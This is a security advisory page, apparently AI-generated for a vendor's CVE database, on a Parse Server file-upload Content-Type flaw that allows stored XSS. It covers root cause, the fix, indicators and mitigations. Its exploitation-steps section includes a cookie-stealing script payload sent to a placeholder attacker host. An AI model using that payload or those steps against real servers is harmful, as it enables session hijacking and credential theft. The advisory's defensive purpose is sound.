CVE-2026-35200: 
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-35200 is a file upload Content-Type override vulnerability in Parse Server (npm package parse-server) that allows authenticated attackers to upload files with a benign extension (e.g., .txt) while supplying a mismatched Content-Type header (e.g., text/html). The server passes the user-provided Content-Type directly to the storage adapter without validating consistency with the file extension, causing cloud storage adapters such as AWS S3 and Google Cloud Storage to serve the file with the attacker-controlled MIME type. Affected versions include all releases up to and including 8.6.72, and versions 9.0.0 through 9.7.1-alpha.3. The vulnerability was published on April 2, 2026, by maintainer mtrezza, with patched versions released the same day. It carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 2.1 (Low) (GitHub Advisory, Parse Server Advisory).

Technical details

The root cause is classified as CWE-436 (Interpretation Conflict): Parse Server's FilesController.createFile method accepts the raw user-supplied Content-Type header and forwards it to the configured storage adapter without verifying that it matches the MIME type implied by the filename extension. Storage adapters like S3 and GCS store and subsequently serve files using the provided Content-Type, causing browsers to interpret the file according to the attacker-controlled MIME type rather than the actual file extension. The default GridFS adapter is not affected because it re-derives Content-Type from the filename extension at serving time. The fix, implemented in PR #10383 (v9 branch) and PR #10384 (v8 branch), changes the createFile logic to always derive Content-Type from the filename extension (mime.getType(filename) || contentType), overriding any user-supplied value when an extension is present (GitHub Advisory, PR #10383, PR #10384).

Impact

Successful exploitation enables stored cross-site scripting (XSS) attacks: an attacker can upload an HTML file with embedded JavaScript under a .txt extension, and when another user accesses the file URL served by S3 or GCS with Content-Type: text/html, the browser executes the script in the context of the storage domain. This can lead to session hijacking, credential theft, malware distribution, or phishing attacks targeting users who access the uploaded file. Confidentiality and integrity of the subsequent (user-facing) system are both rated Low impact; availability is not affected. The vulnerable system itself (the Parse Server) has no direct confidentiality or integrity impact (GitHub Advisory, Parse Server Advisory).

Exploitability

Exploitation requires low-level authentication (an account with file upload privileges) and passive user interaction (a victim must access the uploaded file URL). No public proof-of-concept exploit code has been identified, and there is no evidence of in-the-wild exploitation at this time. The EPSS score is approximately 0.04% (10th percentile), indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory).

Exploitation steps

  1. Obtain upload credentials: Acquire a low-privilege account on a Parse Server instance that permits file uploads (e.g., a free trial or self-registered account).
  2. Craft the malicious file: Create a file with a .txt extension containing an HTML payload with embedded JavaScript, such as <script>document.location='https://attacker.example/steal?c='+document.cookie</script>.
  3. Upload with mismatched Content-Type: Send a file upload request to the Parse Server API endpoint (e.g., POST /1/files/malicious.txt) with the Content-Type header set to text/html instead of text/plain, while the filename retains the .txt extension to pass the allowlist check.
  4. Retrieve the storage URL: Parse Server returns the URL of the uploaded file as stored in S3 or GCS, which will be served with Content-Type: text/html.
  5. Deliver the link to a victim: Share or embed the storage URL in a context where a target user will click it (e.g., a comment, message, or phishing email).
  6. Achieve XSS execution: When the victim's browser fetches the file, the cloud storage serves it with Content-Type: text/html, causing the browser to render and execute the embedded JavaScript, completing the stored XSS attack (GitHub Advisory, Parse Server Advisory).

Indicators of compromise

  • Network: HTTP requests to the Parse Server file upload endpoint (e.g., POST /1/files/*.txt) with a Content-Type header of text/html, application/javascript, or other executable MIME types inconsistent with the file extension.
  • Network: Outbound requests from victim browsers to attacker-controlled domains originating from S3 or GCS file URLs (indicating XSS payload execution).
  • Logs: Parse Server access logs showing file upload requests where the Content-Type header does not match the MIME type implied by the uploaded filename extension.
  • File System / Storage: Files stored in S3 or GCS buckets with metadata Content-Type: text/html (or other executable types) but with non-HTML filename extensions (e.g., .txt, .csv).
  • Logs: Cloud storage access logs (S3/GCS) showing GET requests to files with mismatched extension/Content-Type metadata, particularly from browser user-agents.

Mitigation and workarounds

Upgrade Parse Server to version 8.6.73 (LTS branch) or 9.7.1-alpha.4 (or later, including the stable 9.8.0 release) to apply the fix, which derives Content-Type from the filename extension and overrides any user-supplied value. As a temporary workaround for unpatched deployments, configure the S3 or GCS storage adapter — or a CDN in front of it — to derive Content-Type from the filename extension rather than using the stored metadata value. Additionally, restrict file upload privileges to trusted users only and implement server-side or CDN-level policies that block serving executable MIME types (e.g., text/html, application/javascript) from the file storage domain (GitHub Advisory, PR #10383, PR #10384).

Additional resources


Source: This report was generated using AI

Related JavaScript vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-w2vw-w76x-qr89HIGH8.5
  • JavaScript logoJavaScript
  • nx
NoYesOct 05, 2026
CVE-2026-104852HIGH8.2
  • JavaScript logoJavaScript
  • @graphql-tools/utils
NoYesOct 05, 2026
GHSA-g7fw-3gjp-g5hfMEDIUM6.5
  • JavaScript logoJavaScript
  • @openclaw/matrix
NoYesOct 05, 2026
GHSA-r4xh-jqrq-34v2MEDIUM5.3
  • JavaScript logoJavaScript
  • smol-toml
NoYesOct 05, 2026
GHSA-6688-9rhm-gjv2LOWN/A
  • JavaScript logoJavaScript
  • dompurify
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management